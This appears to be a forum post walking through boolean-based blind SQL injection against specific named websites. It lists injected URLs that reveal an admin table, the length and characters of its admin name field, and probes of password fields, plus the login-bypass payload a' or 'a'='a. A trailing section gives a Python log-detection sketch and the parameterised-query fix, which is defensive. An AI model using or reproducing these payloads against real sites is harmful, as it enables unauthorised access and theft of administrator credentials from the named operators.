There is a SQL injection vulnerability
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20count(*)%20from%20admin)>0
Displays normally
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20count(*)%20from%20admin)>1
Displays a blank page
This shows that
the admin table exists and contains only one record
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20top%201%20len(adminname)%20from%20admin)>1
Displays normally
The admin table has a field named adminname,
and the adminname field of that single record is longer than 1
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20top%201%20len(adminname)%20from%20admin)>4
Displays normally
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20top%201%20len(adminname)%20from%20admin)>5
Displays a blank page
This shows that the length of adminname is 5
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20top%201%20asc(mid(name,5,1))%20from%20user)>105
Displays normally
http://www.27jj.com/news_info.asp?id=30%20and%20 (select%20top%201%20asc(mid(adminname,5,1))%20from%20admin)>106
Does not display normally
This shows that the ASCII code of the fifth character of adminname is 106,
i.e. the fifth character is j
a' or 'a'='a
csr1348
http://www2.gliet.edu.cn/dept3/dept3/show.asp?id=208%20and%20 (select%20top%201%20len(name)%20from%20user)>1
http://www2.gliet.edu.cn/dept3/dept3/show.asp?id=206%20and%20 (select%20top%201%20len(name)%20from%20user)>4
http://www2.gliet.edu.cn/dept3/dept3/show.asp?id=206%20and%20 (select%20top%201%20asc(mid(name,5,1))%20from%20user)>10
http://www.gliet.edu.cn/yuanban/shownews.asp?newsid=636%20and%20 (select%20top%201%20asc(mid(pwd,8,1))%20from%20users)>1
=====
陆毅
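
The request sequence above leaves a recognisable trace in web server logs: the same parameter carrying `and (select ... from <table>)` compared against a changing number. The following detection sketch is an added example, not part of the original message; the log format, client addresses and function names are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote

# Constructed access-log lines (client, method, request target); not taken from the page.
SAMPLE_LOG = """\
192.0.2.10 GET /news_info.asp?id=30
192.0.2.10 GET /news_info.asp?id=30%20and%20(select%20count(*)%20from%20admin)>0
192.0.2.10 GET /news_info.asp?id=30%20and%20(select%20count(*)%20from%20admin)>1
192.0.2.10 GET /news_info.asp?id=30%20and%20(select%20top%201%20len(adminname)%20from%20admin)>4
192.0.2.10 GET /news_info.asp?id=30%20and%20(select%20top%201%20len(adminname)%20from%20admin)>5
192.0.2.10 GET /news_info.asp?id=30%20AND%20(SELECT%20TOP%201%20ASC(MID(adminname,5,1))%20FROM%20admin)>106
198.51.100.7 GET /search.asp?q=select%20a%20sofa%20and%20chairs
"""

# "and (select <expr> from <table>) <op> <number>" inside the decoded query string.
PROBE = re.compile(
    r"\band\s*\(\s*select\b(?P<expr>.+?)\bfrom\s+(?P<table>\w+)\s*\)\s*"
    r"(?P<op>[<>=]{1,2})\s*(?P<n>\d+)", re.IGNORECASE | re.DOTALL)

def classify(expr):
    """Name the inference step from the selected expression."""
    e = expr.lower()
    if "count(" in e:
        return "row-count"
    if "asc(" in e and "mid(" in e:
        return "character"
    if "len(" in e:
        return "length"
    return "other"

def find_probes(log_text):
    """Return {(client, path): [(kind, table, threshold), ...]} for matching requests."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) != 3:
            continue
        client, _method, target = parts
        url = urlsplit(target)
        m = PROBE.search(unquote(url.query))
        if m:
            hits[(client, url.path)].append(
                (classify(m["expr"]), m["table"].lower(), int(m["n"])))
    return dict(hits)

def alerts(log_text, min_requests=3):
    """Flag client/path pairs that repeat the comparison pattern min_requests times or more."""
    return {k: v for k, v in find_probes(log_text).items() if len(v) >= min_requests}
```

Detection only narrows the window; the underlying fix is to bind `id` as a typed parameter instead of concatenating it into the SQL string.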